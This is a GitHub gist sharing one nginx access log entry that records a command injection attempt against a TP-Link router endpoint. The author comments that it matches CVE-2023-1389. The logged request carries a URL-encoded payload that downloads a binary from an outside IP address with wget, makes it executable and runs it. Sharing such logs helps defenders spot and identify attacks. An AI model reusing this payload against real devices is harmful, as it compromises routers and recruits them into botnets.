zcutlip/access.log

Last active July 25, 2024 03:59

Star (0) You must be signed in to star a gist
Fork (0) You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/zcutlip/caa36daf07dfd52c1a2872ff8e7ac6e0.js"></script>
Save zcutlip/caa36daf07dfd52c1a2872ff8e7ac6e0 to your computer and use it in GitHub Desktop.

Download ZIP

Command injection attempt found in nginx access log

Raw

84.54.51.37 - - [24/Jul/2024:12:57:14 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 162 "-" "Go-http-client/1.1"

Author

zcutlip commented Jul 25, 2024

This appears to be the CVE
https://nvd.nist.gov/vuln/detail/CVE-2023-1389

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment